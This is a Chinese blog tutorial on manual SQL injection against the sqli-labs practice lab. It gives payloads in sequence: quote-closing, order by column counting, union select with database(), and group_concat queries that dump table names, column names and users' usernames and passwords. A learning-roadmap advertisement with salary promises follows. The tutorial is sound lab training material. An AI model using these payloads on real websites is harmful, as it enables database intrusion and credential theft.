浅谈基于报错的手工注入

浅谈基于报错的手工注入

实验环境:sqlli

1.首先提示,请输入ID作为参数和数值

img

2.构建id参数后,返回正常

img

3.输入转义符 \ ,得到报错信息 “1”) LIMIT 0,1 (图片上引号内的为报错信息,所以这里去掉两个引号)

img

由此,我们可以得到大概的SQL语句为尝试闭合单引号,并注释之后的内容,输入1") --+

img

可以看到返回正常页面

4.在闭合后,输入order by 5 判断有几个字段,判断成功则会返回正常页面

img

5个字段报错,输入4,输入3 尝试

img

再输入order by 3 的时候,页面返回正常,说明有有三个字段

img

5.接下来使用union联合查询,查看哪些位置可以利用

首先将参数报错,id改为-1

其次构建语句 union select 1,2,3 (之前检测出3个字段)

img

返回2,3 说明2和3可以返回我们想要的值。

把2替换为database() 查看当前数据库,显示成功

img

6.接下来爆数据

首先是查找表名

输入

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ 

复制

链接表,显示表名,从mysql数据库总表中,筛选条件 表名等于当前数据库名

显示出当前数据库中的所有表

img

我们继续读取users表中的信息

输入

 union select 1,group_concat(column_name),3 from  information_schema.columns where table_name='users' --+

复制

链接表,显示字段名 ,从mysql总表中,赛选出表名等于 users 的数据

img

接下来获取字段值,username和password的值

输入

union select 1,group_concat(username,0x3a,passowrd),3 from users --+

复制

链接表 从用户表中读取数据,显示用户名密码用冒号进行分割

img

–+


复制

链接表 从用户表中读取数据,显示用户名密码用冒号进行分割

[外链图片转存中...(img-fnAtmDHF-1678906166463)]

最后就得到了我们想要的信息。

#  网络安全基础入门需要学习哪些知识?

## 网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

![img](https://img-blog.csdnimg.cn/d94b77bc9eee4d11abab8604ea7d2a64.png)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v19T846c-1677167179814)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

##  阶段一:基础入门

![img](https://img-blog.csdnimg.cn/img_convert/d8ad143de3b89a20307179b8d44c4f6f.png)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-sRoDZu4K-1677167179814)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

> 网络安全导论
>
> 渗透测试基础
>
> 网络基础
>
> 操作系统基础
>
> Web安全基础
>
> 数据库基础
>
> 编程基础
>
> CTF基础

**该阶段学完即可年薪15w+**

## 阶段二:技术进阶(到了这一步你才算入门)

![img](https://img-blog.csdnimg.cn/img_convert/8d47774ee74b3a902b1deb00d3fb26f7.png)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-il25GFVz-1677167179815)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]



> 弱口令与口令爆破
>
> XSS漏洞
>
> CSRF漏洞
>
> SSRF漏洞
>
> XXE漏洞
>
> SQL注入
>
> 任意文件操作漏洞
>
> 业务逻辑漏洞

**该阶段学完年薪25w+**

## 阶段三:高阶提升

![img](https://img-blog.csdnimg.cn/img_convert/86eba8b6ea97417700bfc245ed75dea0.png)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ITOSD3Gz-1677167179816)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]





> 反序列化漏洞
>
> RCE
>
> 综合靶场实操项目
>
> 内网渗透
>
> 流量分析
>
> 日志分析
>
> 恶意代码分析
>
> 应急响应
>
> 实战训练

**该阶段学完即可年薪30w+**

## 阶段四:蓝队课程

![img](https://img-blog.csdnimg.cn/img_convert/385c5927bfeb1e4310d5fd914aa6dfe7.png)[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKCwwld2-1677167179818)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]



> 蓝队基础
>
> 蓝队进阶
>
> 该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

**攻防兼备,年薪收入可以达到40w+**

## 阶段五:面试指南&阶段六:升级内容

![img](https://img-blog.csdnimg.cn/img_convert/3b653137f34ce068817347b444447b6c.png)

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容

![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/e66c204f607749928e7805c235b5bbfc.jpeg)
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值